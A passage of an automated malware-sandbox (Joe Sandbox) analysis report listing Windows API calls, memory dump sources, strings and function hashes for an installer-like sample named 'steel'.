                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CursorDesktopWindow$Show
                                                                                            • String ID:
                                                                                            • API String ID: 2074268717-0
                                                                                            • Opcode ID: 48e3412c1a46991eea637d4b1b247886da5b7466a2ee9d80c19fa9edf3c8b710
                                                                                            • Instruction ID: d0219f8535474b9b7e790bb207accfb6dce16a9ac66decbe361331da1304c66b
                                                                                            • Opcode Fuzzy Hash: 48e3412c1a46991eea637d4b1b247886da5b7466a2ee9d80c19fa9edf3c8b710
                                                                                            • Instruction Fuzzy Hash: 91412C75600210AFC710DF2AFA84B56B7E1EB65329B16817BE405CB365DB38DD81CF98
                                                                                            APIs
                                                                                            • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A75
                                                                                            • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AE4
                                                                                            • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B7F
                                                                                            • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BBE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: LoadString$FileMessageModuleName
                                                                                            • String ID:
                                                                                            • API String ID: 704749118-0
                                                                                            • Opcode ID: ede814ba8b2c905ab74f80468cae56b5ab65d73ed59c96bbcc76a4520df8398d
                                                                                            • Instruction ID: 7d65b0a5aa49ad722f3f3263bbe29e3330acee4661d9e2153cfe083702b22da2
                                                                                            • Opcode Fuzzy Hash: ede814ba8b2c905ab74f80468cae56b5ab65d73ed59c96bbcc76a4520df8398d
                                                                                            • Instruction Fuzzy Hash: 1F3123716083849AD370EB65C945BDF77D89B85704F40483FB6C8E72D1EB7859048B6B
                                                                                            APIs
                                                                                            • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E90D
                                                                                              • Part of subcall function 0044CF50: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044CF82
                                                                                            • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E991
                                                                                              • Part of subcall function 0042BBB4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBC8
                                                                                            • IsRectEmpty.USER32(?), ref: 0044E953
                                                                                            • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E976
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                                                            • String ID:
                                                                                            • API String ID: 855768636-0
                                                                                            • Opcode ID: a4575d285c62c1c56b7686ad69dfdc5ef60a631fed5d3d1fc0705a1474777ead
                                                                                            • Instruction ID: f7bad605b8f68185b4e834990bb8ca2287257270a928060092b59a923d315d7c
                                                                                            • Opcode Fuzzy Hash: a4575d285c62c1c56b7686ad69dfdc5ef60a631fed5d3d1fc0705a1474777ead
                                                                                            • Instruction Fuzzy Hash: E5114A71B0030067E650BA7B8C86B5B76C9AB88748F15083FB545EB387DE7DDD094299
                                                                                            APIs
                                                                                            • OffsetRect.USER32(?,?,00000000), ref: 00495988
                                                                                            • OffsetRect.USER32(?,00000000,?), ref: 004959A3
                                                                                            • OffsetRect.USER32(?,?,00000000), ref: 004959BD
                                                                                            • OffsetRect.USER32(?,00000000,?), ref: 004959D8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: OffsetRect
                                                                                            • String ID:
                                                                                            • API String ID: 177026234-0
                                                                                            • Opcode ID: e6cd63ab1267e2bef36e0ea42f4f89ffcc49fa5b03609306a0fb63f812f5ac90
                                                                                            • Instruction ID: 9409249b62c1188f54b5b62e2685c04785358b71117f53a2337039625fc08c68
                                                                                            • Opcode Fuzzy Hash: e6cd63ab1267e2bef36e0ea42f4f89ffcc49fa5b03609306a0fb63f812f5ac90
                                                                                            • Instruction Fuzzy Hash: 1121AEB6700701AFDB00DE69CD81E5BB7DAEFC4350F248A2AF944C3249D638ED048761
                                                                                            APIs
                                                                                            • GetCursorPos.USER32 ref: 00417260
                                                                                            • SetCursor.USER32(00000000), ref: 004172A3
                                                                                            • GetLastActivePopup.USER32(?), ref: 004172CD
                                                                                            • GetForegroundWindow.USER32(?), ref: 004172D4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                                                            • String ID:
                                                                                            • API String ID: 1959210111-0
                                                                                            • Opcode ID: 0325eb73ca892009698aa7541b5e3073a06fcfb7bd7d3fb361e05756697ccdec
                                                                                            • Instruction ID: de3f0dc6b436800086b9427ec8ddd2ec86eeedce3a35093462374e80c8eda50e
                                                                                            • Opcode Fuzzy Hash: 0325eb73ca892009698aa7541b5e3073a06fcfb7bd7d3fb361e05756697ccdec
                                                                                            • Instruction Fuzzy Hash: C52183313086118AD720AFA9E945AE733F1EF44754B0544ABF8558B352DB3DDC82CB9E
                                                                                            APIs
                                                                                            • MulDiv.KERNEL32(?,00000008,?), ref: 004955F1
                                                                                            • MulDiv.KERNEL32(?,00000008,?), ref: 00495605
                                                                                            • MulDiv.KERNEL32(?,00000008,?), ref: 00495619
                                                                                            • MulDiv.KERNEL32(?,00000008,?), ref: 00495637
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                            • Instruction ID: b77f8f3c6746ea581d036ce488ab013aedd37a602364075716cddbfd1b85439e
                                                                                            • Opcode Fuzzy Hash: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                            • Instruction Fuzzy Hash: A5112E72604504ABCB40DEA9D8C4D9B7BECEF8D324B6441AAF908DB242D674ED408B68
                                                                                            APIs
                                                                                            • GetClassInfoA.USER32(00400000,0041F470,?), ref: 0041F4A1
                                                                                            • UnregisterClassA.USER32(0041F470,00400000), ref: 0041F4CA
                                                                                            • RegisterClassA.USER32(00499598), ref: 0041F4D4
                                                                                            • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F50F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                            • String ID:
                                                                                            • API String ID: 4025006896-0
                                                                                            • Opcode ID: 7a514111b6068dfbbdb04c48d1a2146d17cf63cab41d43eccfd0167b2dbd8d5c
                                                                                            • Instruction ID: 7a0dc659497f48f9aad4428a0df7724adcaf244520b53866b591a9b3b5545ee4
                                                                                            • Opcode Fuzzy Hash: 7a514111b6068dfbbdb04c48d1a2146d17cf63cab41d43eccfd0167b2dbd8d5c
                                                                                            • Instruction Fuzzy Hash: F6011B72240104AADA10EBACED81E9B33999729314B11423BB615E72A2D6399C558BAC
                                                                                            APIs
                                                                                            • WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454FCA
                                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
                                                                                            • CloseHandle.KERNEL32(?,00455006,00454FFF,?,?,?,00000000,?,?,004551DB,?,?,?,00000044,00000000,00000000), ref: 00454FF9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                                            • String ID:
                                                                                            • API String ID: 4071923889-0
                                                                                            • Opcode ID: 8aa0dd6ec5a68f6f7641eb82506f7728cd0b20fc7582fe19e2ee2bc87ac6724f
                                                                                            • Instruction ID: ea90b2abd28d60bbe0c33bbe6d7a83e36ef454db8471bda6b5c19e9a906557d9
                                                                                            • Opcode Fuzzy Hash: 8aa0dd6ec5a68f6f7641eb82506f7728cd0b20fc7582fe19e2ee2bc87ac6724f
                                                                                            • Instruction Fuzzy Hash: B9012D31A006097FEB1097AA8C02F6FBBECDF49764F610127F904D72C2C5788D409A78
                                                                                            APIs
                                                                                            • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D027
                                                                                            • LoadResource.KERNEL32(00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?,?,0047CB58,0000000A,00000000), ref: 0040D041
                                                                                            • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?,?,0047CB58), ref: 0040D05B
                                                                                            • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?), ref: 0040D065
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                                            • String ID:
                                                                                            • API String ID: 3473537107-0
                                                                                            • Opcode ID: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
                                                                                            • Instruction ID: ce77ce8360aa458f47a01e9b0563465317cd85cc21d7bcd45488e041df035c61
                                                                                            • Opcode Fuzzy Hash: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
                                                                                            • Instruction Fuzzy Hash: 49F04F726056046F9B14EE59A881D5B77ECDE88268310013AF908E7286DA38DD018B68
                                                                                            APIs
                                                                                            • RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,02187D4C,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                            • RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,02187D4C,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                            • LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,02187D4C,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                            • RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,02187D4C,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                            • String ID:
                                                                                            • API String ID: 730355536-0
                                                                                            • Opcode ID: 303ccfa916ee30606edfd417ee1dfeae8d79d4aa2781d0ec5268568314661242
                                                                                            • Instruction ID: 91310e2de28581c92a9b529d79901d52005bdf0b1253609ef7109df0d78d257f
                                                                                            • Opcode Fuzzy Hash: 303ccfa916ee30606edfd417ee1dfeae8d79d4aa2781d0ec5268568314661242
                                                                                            • Instruction Fuzzy Hash: D001A1706482409EE719AB69BA467253FD4D795B48F11803BF840A6BF3C77C4440EBAD
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 004705F1
                                                                                            Strings
                                                                                            • Unsetting NTFS compression on file: %s, xrefs: 004705D7
                                                                                            • Setting NTFS compression on file: %s, xrefs: 004705BF
                                                                                            • Failed to set NTFS compression state (%d)., xrefs: 00470602
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast
                                                                                            • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                                                            • API String ID: 1452528299-3038984924
                                                                                            • Opcode ID: 4a85a403c5f553919e8eb8264edf58c674aea38054a880eb2495f4adb197a451
                                                                                            • Instruction ID: 452327faed6fd823952186a677ff1a78a18aba12ee86070aec797b5412e08bdc
                                                                                            • Opcode Fuzzy Hash: 4a85a403c5f553919e8eb8264edf58c674aea38054a880eb2495f4adb197a451
                                                                                            • Instruction Fuzzy Hash: A5018B71D09248A6CB04D7AD94512DDBBE49F4D314F44C5FFE459D7342DB780A088B9E
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(00000000,00000000), ref: 0046FE45
                                                                                            Strings
                                                                                            • Failed to set NTFS compression state (%d)., xrefs: 0046FE56
                                                                                            • Setting NTFS compression on directory: %s, xrefs: 0046FE13
                                                                                            • Unsetting NTFS compression on directory: %s, xrefs: 0046FE2B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast
                                                                                            • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                                                            • API String ID: 1452528299-1392080489
                                                                                            • Opcode ID: 01501a136b81c39b7c411191948b84cc59583678e1d21d505a98b8108a1a9e37
                                                                                            • Instruction ID: 6c3eba688a3488f6cff2036d9eec8e6f632fba0cce39d579df3f4bd3b957a0ce
                                                                                            • Opcode Fuzzy Hash: 01501a136b81c39b7c411191948b84cc59583678e1d21d505a98b8108a1a9e37
                                                                                            • Instruction Fuzzy Hash: E5014421E0824856CB04D7ADE44129DBBA49F49304F4485BBA495E7253EB790A09879B
                                                                                            APIs
                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045B7AE,?,?,?,?,?,00000000,0045B7D5), ref: 00455DD8
                                                                                            • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045B7AE,?,?,?,?,?,00000000), ref: 00455DE1
                                                                                            • RemoveFontResourceA.GDI32(00000000), ref: 00455DEE
                                                                                            • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00455E02
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                                                            • String ID:
                                                                                            • API String ID: 4283692357-0
                                                                                            • Opcode ID: 53be27aa0997865f395f34354d63af882f7726c3d4a8d794711f16c86898bbe7
                                                                                            • Instruction ID: 71ccc6c4ad223293e5fa71c014565a1ca4f3f808124b73c5b0663eb55104ffd2
                                                                                            • Opcode Fuzzy Hash: 53be27aa0997865f395f34354d63af882f7726c3d4a8d794711f16c86898bbe7
                                                                                            • Instruction Fuzzy Hash: 57F0BEB174070036EA10B6BAAC4BF2B26CC8F54745F10883ABA00EF2C3D97CDC04962D
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$CountSleepTick
                                                                                            • String ID:
                                                                                            • API String ID: 2227064392-0
                                                                                            • Opcode ID: dfa0650b41a5fbb69b4da717be5ba207ba5450cdb50d9376c11a56b5a3797e8a
                                                                                            • Instruction ID: 56d8cd0ebf6ab4a4d31aad6ab38b951dee0ff9c0bbbb70c30f4e079d31b44593
                                                                                            • Opcode Fuzzy Hash: dfa0650b41a5fbb69b4da717be5ba207ba5450cdb50d9376c11a56b5a3797e8a
                                                                                            • Instruction Fuzzy Hash: C6E0ED6A30921149863131AE98CA6AF4D48CBC2324B28853FE08CE6283C89C4C0A867E
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8,?,?,?,?,?,00498CDB,00000000), ref: 0047820D
                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8,?,?,?,?,?,00498CDB), ref: 00478213
                                                                                            • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8), ref: 00478235
                                                                                            • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8), ref: 00478246
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                            • String ID:
                                                                                            • API String ID: 215268677-0
                                                                                            • Opcode ID: 89672e1c1dad377db11468aaf314ccfc00159a4e206af17bba33db1213e8e157
                                                                                            • Instruction ID: 91f0679cb69370e855683a510bc75a037ced8834772831ea40795c83ba0b1c60
                                                                                            • Opcode Fuzzy Hash: 89672e1c1dad377db11468aaf314ccfc00159a4e206af17bba33db1213e8e157
                                                                                            • Instruction Fuzzy Hash: D8F037716447007BD600E6B58C81E5B73DCEB44354F04493E7E98C71C1DA78DC089776
                                                                                            APIs
                                                                                            • GetLastActivePopup.USER32(?), ref: 0042424C
                                                                                            • IsWindowVisible.USER32(?), ref: 0042425D
                                                                                            • IsWindowEnabled.USER32(?), ref: 00424267
                                                                                            • SetForegroundWindow.USER32(?), ref: 00424271
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                                            • String ID:
                                                                                            • API String ID: 2280970139-0
                                                                                            • Opcode ID: d317456c615bf9008b67529b06aff5f9fae4f5f479d94640f2b11ca0dbd6cbb7
                                                                                            • Instruction ID: 2c5ff33fc315f6eb6fab431e1453bcb0e66c5aaaa6596e28cc8dc28fd0b03a53
